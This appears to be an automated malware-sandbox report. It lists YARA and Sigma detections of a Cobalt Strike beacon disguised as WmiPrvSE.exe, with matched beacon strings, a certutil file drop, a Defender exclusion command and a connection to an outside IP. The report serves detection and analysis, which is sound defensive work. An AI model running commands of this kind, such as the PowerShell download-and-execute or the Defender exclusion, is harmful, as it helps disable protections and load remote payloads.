Process Memory Space: WmiPrvSE.exe PID: 7928	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2cd3f:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x4ac13:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2cb19:$x2: %d is an x86 process (can't inject x64 content) 0x4a9ed:$x2: %d is an x86 process (can't inject x64 content) 0x2ccf5:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4abc9:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2cdd9:$x4: Failed to impersonate token from %d (%u) 0x4acad:$x4: Failed to impersonate token from %d (%u) 0x2ce30:$x5: Failed to impersonate logged on user %d (%u) 0x4ad04:$x5: Failed to impersonate logged on user %d (%u) 0x2c1f0:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4a0c4:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.WmiPrvSE.exe.1a0000.0.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x303a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3041b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3047e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x304c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30502:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30538:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30160:$a39: %s as %s\%s: %d 0x30394:$a40: %s.1%x.%x%x.%s 0x3e7e2:$a41: beacon.x64.dll 0x30387:$a43: www6.%x%x.%s 0x3037b:$a44: cdn.%x%x.%s 0x30360:$a47: beacon.dll 0x302d8:$a48: %s%s: %s 0x3018c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x301b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
23.2.WmiPrvSE.exe.1a0000.0.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1c13c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
23.2.WmiPrvSE.exe.1a0000.0.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17d6a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1909b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
23.2.WmiPrvSE.exe.1a0000.0.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e7f1:$loader_export: ReflectiveLoader 0x30360:$exportname: beacon.dll
23.2.WmiPrvSE.exe.1a0000.0.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x303a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
23.2.WmiPrvSE.exe.1a0000.0.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
23.2.WmiPrvSE.exe.760000.2.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.760000.2.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.760000.2.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
23.2.WmiPrvSE.exe.760000.2.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
23.2.WmiPrvSE.exe.760000.2.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
23.2.WmiPrvSE.exe.760000.2.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
23.2.WmiPrvSE.exe.760000.2.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
23.2.WmiPrvSE.exe.760000.2.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
23.2.WmiPrvSE.exe.760000.2.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
23.2.WmiPrvSE.exe.760000.2.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
23.2.WmiPrvSE.exe.760000.2.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
23.2.WmiPrvSE.exe.760000.2.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
23.2.WmiPrvSE.exe.760000.2.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.760000.2.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
23.2.WmiPrvSE.exe.760000.2.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
23.2.WmiPrvSE.exe.760000.2.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
23.2.WmiPrvSE.exe.760000.2.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
23.2.WmiPrvSE.exe.760000.2.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
23.2.WmiPrvSE.exe.760000.2.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
23.2.WmiPrvSE.exe.760000.2.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
23.2.WmiPrvSE.exe.760000.2.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
23.2.WmiPrvSE.exe.760000.2.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
23.2.WmiPrvSE.exe.760000.2.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
Click to see the 40 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\WmiPrvSE.exe, CommandLine: C:\Users\Public\WmiPrvSE.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\WmiPrvSE.exe, NewProcessName: C:\Users\Public\WmiPrvSE.exe, OriginalFileName: C:\Users\Public\WmiPrvSE.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\WmiPrvSE.exe, ProcessId: 7928, ProcessName: WmiPrvSE.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\WmiPrvSE.exe

Sigma detected: Legitimate Application Dropped Executable

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\WmiPrvSE.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", ProcessId: 8072, ProcessName: powershell.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.76.192.215, DestinationIsIpv6: false, DestinationPort: 59611, EventID: 3, Image: C:\Users\Public\WmiPrvSE.exe, Initiated: true, ProcessId: 7928, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\WmiPrvSE.exe

Sigma detected: Powershell Defender Exclusion

